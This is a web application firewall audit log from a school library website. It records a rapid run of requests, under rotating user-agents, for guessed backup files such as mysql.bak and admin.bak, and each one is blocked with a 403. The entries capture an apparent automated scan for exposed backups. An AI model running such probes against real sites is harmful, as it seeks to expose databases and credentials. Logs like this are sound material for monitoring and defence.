"pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855513180 1977 (- - -) Stopwatch2: 1747543855513180 1977; combined=715, p1=363, p2=320, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96b03425-Z-- --d775cb1f-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSLwAAAIU 103.236.140.4 55668 103.236.140.4 8181 --d775cb1f-B-- GET /mysql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729 Safari/537.36 OPR/57.0.3098.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149979145 --d775cb1f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d775cb1f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855513476 2129 (- - -) Stopwatch2: 1747543855513476 2129; combined=819, p1=411, p2=379, p3=0, p4=0, p5=29, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d775cb1f-Z-- --ea8a2d3d-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o7_AAAABE 103.236.140.4 55680 103.236.140.4 8181 --ea8a2d3d-B-- GET /erpustakaansmkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 OPR/56.0.3051.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117910677 --ea8a2d3d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ea8a2d3d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855507864 8246 (- - -) Stopwatch2: 1747543855507864 8246; combined=6544, p1=6112, p2=404, p3=0, p4=0, p5=27, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea8a2d3d-Z-- --9f2eba7a-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdZgAAAMc 103.236.140.4 53740 103.236.140.4 8181 --9f2eba7a-B-- GET /admin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:52.4.0) Gecko/20100101 Firefox/52.4.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127994675 --9f2eba7a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9f2eba7a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855512649 9138 (- - -) Stopwatch2: 1747543855512649 9138; combined=1075, p1=368, p2=677, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f2eba7a-Z-- --fe98d503-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdcQAAAMc 103.236.140.4 55616 103.236.140.4 8181 --fe98d503-B-- GET /1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 OPR/51.0.2830.40 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150536207 --fe98d503-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fe98d503-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855522138 2593 (- - -) Stopwatch2: 1747543855522138 2593; combined=785, p1=399, p2=352, p3=0, p4=0, p5=34, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe98d503-Z-- --524fe66e-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8CgAAAAU 103.236.140.4 55596 103.236.140.4 8181 --524fe66e-B-- GET /site.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127883807 --524fe66e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --524fe66e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855519024 5882 (- - -) Stopwatch2: 1747543855519024 5882; combined=705, p1=290, p2=383, p3=0, p4=0, p5=32, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --524fe66e-Z-- --1369964f-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8EwAAAAU 103.236.140.4 55736 103.236.140.4 8181 --1369964f-B-- GET /local.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2; rv:52.9.0) Gecko/20100101 Firefox/52.9.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152305670 --1369964f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1369964f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855526193 2653 (- - -) Stopwatch2: 1747543855526193 2653; combined=753, p1=380, p2=333, p3=0, p4=0, p5=39, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1369964f-Z-- --2015997a-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSQQAAAIk 103.236.140.4 55738 103.236.140.4 8181 --2015997a-B-- GET /new.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.3.0) Gecko/20100101 Firefox/52.3.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152240137 --2015997a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2015997a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855526648 10970 (- - -) Stopwatch2: 1747543855526648 10970; combined=936, p1=443, p2=329, p3=0, p4=0, p5=163, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2015997a-Z-- --35023168-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSVQAAAI8 103.236.140.4 55660 103.236.140.4 8181 --35023168-B-- GET /2025.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 154009609 --35023168-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --35023168-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855625478 4087 (- - -) Stopwatch2: 1747543855625478 4087; combined=874, p1=535, p2=311, p3=0, p4=0, p5=28, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35023168-Z-- --6d475e35-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSWQAAAJE 103.236.140.4 55458 103.236.140.4 8181 --6d475e35-B-- GET /2012.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4; rv:52.5.0) Gecko/20100101 Firefox/52.5.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 123016404 --6d475e35-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6d475e35-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855627617 5124 (- - -) Stopwatch2: 1747543855627617 5124; combined=2464, p1=735, p2=1616, p3=0, p4=0, p5=113, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d475e35-Z-- --ae948717-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8KQAAAAY 103.236.140.4 55610 103.236.140.4 8181 --ae948717-B-- GET /master.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155222019 --ae948717-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ae948717-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855633579 2151 (- - -) Stopwatch2: 1747543855633579 2151; combined=769, p1=387, p2=352, p3=0, p4=0, p5=29, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae948717-Z-- --90df5442-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdhAAAAMg 103.236.140.4 53770 103.236.140.4 8181 --90df5442-B-- GET /asp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 OPR/53.0.2907.110 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118036587 --90df5442-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --90df5442-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855629389 7031 (- - -) Stopwatch2: 1747543855629389 7031; combined=1814, p1=1335, p2=451, p3=0, p4=0, p5=27, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90df5442-Z-- --376f4b6d-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSaAAAAJQ 103.236.140.4 54204 103.236.140.4 8181 --376f4b6d-B-- GET /smkn22jakarta.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 10645775 --376f4b6d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --376f4b6d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855637259 2856 (- - -) Stopwatch2: 1747543855637259 2856; combined=1407, p1=389, p2=989, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --376f4b6d-Z-- --a1cb6028-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8LQAAAAg 103.236.140.4 55746 103.236.140.4 8181 --a1cb6028-B-- GET /2023.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 93678564 --a1cb6028-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a1cb6028-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855635642 8166 (- - -) Stopwatch2: 1747543855635642 8166; combined=4467, p1=3385, p2=365, p3=0, p4=0, p5=716, sr=728, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1cb6028-Z-- --a832ae37-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EcAAAAEo 103.236.140.4 55598 103.236.140.4 8181 --a832ae37-B-- GET /vb.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1; rv:66.0.3) Gecko/20100101 Firefox/66.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149126423 --a832ae37-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a832ae37-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855642744 3046 (- - -) Stopwatch2: 1747543855642744 3046; combined=864, p1=391, p2=437, p3=0, p4=0, p5=35, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a832ae37-Z-- --f79e3617-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSdQAAAIM 103.236.140.4 55668 103.236.140.4 8181 --f79e3617-B-- GET /dat.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 144011491 --f79e3617-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f79e3617-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855643975 2088 (- - -) Stopwatch2: 1747543855643975 2088; combined=825, p1=420, p2=375, p3=0, p4=0, p5=30, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f79e3617-Z-- --e35cb40a-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8MQAAAAw 103.236.140.4 55652 103.236.140.4 8181 --e35cb40a-B-- GET /log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0.2) Gecko/20100101 Firefox/55.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151486473 --e35cb40a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e35cb40a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855642978 3761 (- - -) Stopwatch2: 1747543855642978 3761; combined=1613, p1=359, p2=1220, p3=0, p4=0, p5=33, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
